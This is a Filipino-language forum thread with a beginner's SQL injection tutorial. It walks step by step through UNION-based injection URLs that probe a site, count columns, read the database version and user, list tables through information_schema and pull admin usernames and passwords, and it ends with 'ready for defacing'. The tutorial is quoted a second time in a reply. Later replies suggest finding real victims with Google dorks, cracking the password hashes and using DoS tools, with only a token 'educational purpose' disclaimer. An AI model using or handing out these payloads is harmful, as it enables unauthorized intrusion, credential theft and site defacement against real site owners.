What's new
Symbianize Forum

Most of our features and services are available only to members, so we encourage you to login or register a new account. Registration is free, fast and simple. You only need to provide a valid email. Being a member you'll gain access to all member forums and features, post a message to ask question or provide answer, and share or find resources related to mobile phones, tablets, computers, game consoles, and multimedia.

All that and more, so what are you waiting for, click the register button and join us now! Ito ang website na ginawa ng pinoy para sa pinoy!

SQLinjection basic tutorial

eras

eras

Novice
Advanced Member
Messages
36
Reaction score
2
Points
28
:nerd: :nerd: :nerd: **SQLinjection basic tutorial** :nerd: :nerd: :nerd:

This tutorial is for educational purpose only.

Okay lets start

Example site: http://CoDeX.com/index.php?id=10

Note example lang yan. Base on my leetname.

Steps on this tutorial

Step 1. First you need to find if the site is vulnerable

http://CoDeX.com/index.php?id=10

//Para malaman if vulnerable ba yung url.
Lagyan ng ' sa dulo.

http://CoDeX.com/index.php?id=10'

//Pag nag error vulnerable yun.

Step 2. Finding columns.

http://CoDeX.com/index.php?id=10 order by 1--

//Walang error (walang mag babago sa site)
Pag patuloy nyo hanggang 2--, 3--, 4--, ......... hanggang sa may makita kayong error sa site. Pag 4--ang nag error ang dun tayo sa 3--, dun sa last na hindi nag error.

Step 3. Select columns

http://CoDeX.com/index.php?id=-10 UNION ALL SELECT 1,2,3--

//May mga numbers na lalabas jan, yan yung columns. Piliin nyo yung naka bold na number. Pag walang naka bold susubukan mo lahat.

Step 4. Finding version,database,user.

//In this part. 1 na uunahin ko if walang naka bold sa columns. Pero kung meron dun kayo mag lagay ng code. Alisin nyo yung number na yun then dun nyo ilagay yung codes.

For version
http://CoDeX.com/index.php?id=-10 UNION ALL SELECT version(),2,3--

For Database
http://CoDeX.com/index.php?id=-10 UNION ALL SELECT database(),2,3--

For user
http://CoDeX.com/index.php?id=-10 UNION ALL SELECT user(),2,3--

Step 5. Finding Tables

http://CoDeX.com/index.php?id=-10 UNION ALL SELECT column_name,2,3 from information_schema.columns where table_name=char()--

//May mga lalabas na tables jan, tapos pili kayo ng table na gagamitin natin next step.

//Ang napili ko is ADMINS.

//Convert natin yun ADMINS into ASCII format
ADMINS = 65 68 77 73 78 83 in ASCII format

//Ilagay natin sa loob ng CHAR yung converted ASCII natin.

http://CoDeX.com/index.php?id=-10 UNION ALL SELECT column_name,2,3 from information_schema.columns where table_name=char(65,68,77,73,78,83)--

//Yan nakuha na rin natin yung columns in table ADMINS.

Step 6. Kunin natin yung username and password.

http://CoDeX.com/index.php?id=-10 UNION ALL SELECT concat(username,0x3a,password),2,3, from ADMINS--

If naka MD5 format convert nyo na lang. :)

Ready for defacing na yan. :) pero hanggang jan na lang muna. :) hihi

Ps: di ko alam kung magulo ba tut ko. Paki intindi na lang. :)

DONE!!!

Happy Sharing

~CoDeX

#AllHailPHU
 
erasmopahid said:
:nerd: :nerd: :nerd: **SQLinjection basic tutorial** :nerd: :nerd: :nerd:

This tutorial is for educational purpose only.

Okay lets start

Example site: http://CoDeX.com/index.php?id=10

Note example lang yan. Base on my leetname.

Steps on this tutorial

Step 1. First you need to find if the site is vulnerable

http://CoDeX.com/index.php?id=10

//Para malaman if vulnerable ba yung url.
Lagyan ng ' sa dulo.

http://CoDeX.com/index.php?id=10'

//Pag nag error vulnerable yun.

Step 2. Finding columns.

http://CoDeX.com/index.php?id=10 order by 1--

//Walang error (walang mag babago sa site)
Pag patuloy nyo hanggang 2--, 3--, 4--, ......... hanggang sa may makita kayong error sa site. Pag 4--ang nag error ang dun tayo sa 3--, dun sa last na hindi nag error.

Step 3. Select columns

http://CoDeX.com/index.php?id=-10 UNION ALL SELECT 1,2,3--

//May mga numbers na lalabas jan, yan yung columns. Piliin nyo yung naka bold na number. Pag walang naka bold susubukan mo lahat.

Step 4. Finding version,database,user.

//In this part. 1 na uunahin ko if walang naka bold sa columns. Pero kung meron dun kayo mag lagay ng code. Alisin nyo yung number na yun then dun nyo ilagay yung codes.

For version
http://CoDeX.com/index.php?id=-10 UNION ALL SELECT version(),2,3--

For Database
http://CoDeX.com/index.php?id=-10 UNION ALL SELECT database(),2,3--

For user
http://CoDeX.com/index.php?id=-10 UNION ALL SELECT user(),2,3--

Step 5. Finding Tables

http://CoDeX.com/index.php?id=-10 UNION ALL SELECT column_name,2,3 from information_schema.columns where table_name=char()--

//May mga lalabas na tables jan, tapos pili kayo ng table na gagamitin natin next step.

//Ang napili ko is ADMINS.

//Convert natin yun ADMINS into ASCII format
ADMINS = 65 68 77 73 78 83 in ASCII format

//Ilagay natin sa loob ng CHAR yung converted ASCII natin.

http://CoDeX.com/index.php?id=-10 UNION ALL SELECT column_name,2,3 from information_schema.columns where table_name=char(65,68,77,73,78,83)--

//Yan nakuha na rin natin yung columns in table ADMINS.

Step 6. Kunin natin yung username and password.

http://CoDeX.com/index.php?id=-10 UNION ALL SELECT concat(username,0x3a,password),2,3, from ADMINS--

If naka MD5 format convert nyo na lang. :)

Ready for defacing na yan. :) pero hanggang jan na lang muna. :) hihi

Ps: di ko alam kung magulo ba tut ko. Paki intindi na lang. :)

DONE!!!

Happy Sharing

~CoDeX

#AllHailPHU
Click to expand...

di ko magawa hahahaha! bakit ganon
 
ibang site subukan mo syempre. haha example site lang yan base sa LeetName ko
 
san po ilalagay yung order by ts? newbie lang po sa hacking..:) thanks po
 
Last edited:
use google dorks to find websites vulnerable to attacks, pag my target na kayo, gawin niyo lang yung pinost ni author, hash passwords can be decoded sa mga free webdecoding sites, example (google hashkiller)

add mo na rin author yung rules na lalabagin ng nila if ever magalit ang ttargetin nila, advice ko? inactive sites na almost ilang years na hindi na uupdate. dead site for short.

penetration is ilegal, you can be traced or tracked upon entering the hosting site you are attacking. :read:
 
After ng dork. Dun mo lagay yung order by. Di hacking ang tinuturo ko. For pentration testing po yan. Haha �� for educational purpose. ������
 
sige next time. using hammer. or xerxes. haha
 
You must log in or register to reply here.

Similar threads

eras
SQLi WAF ByPass
Replies
0
Views
259
eras
eras
King James Harden Jr
Set Up Wittybunny look a like app (Test Mode)
Replies
13
Views
3K
URAZKY
URAZKY
jordan finezh
Oppo F1 Repair or Flashing Pasok [Tutorial]
Replies
14
Views
5K
alejoaldin24
A
gamerdad7
PSVITA+PSTV 3.60- hacking tutorial for newbies + Games torrent links
2 3 4
Replies
63
Views
17K
doityourself
doityourself
QuestPrivate
ASUS Zenfone 2 ZE551/ZE550 [OFFICIAL THREAD] [ROOTING] [TWRP] [CUSTOM ROM]
2
Replies
23
Views
6K
waray89
W
Back
Top Bottom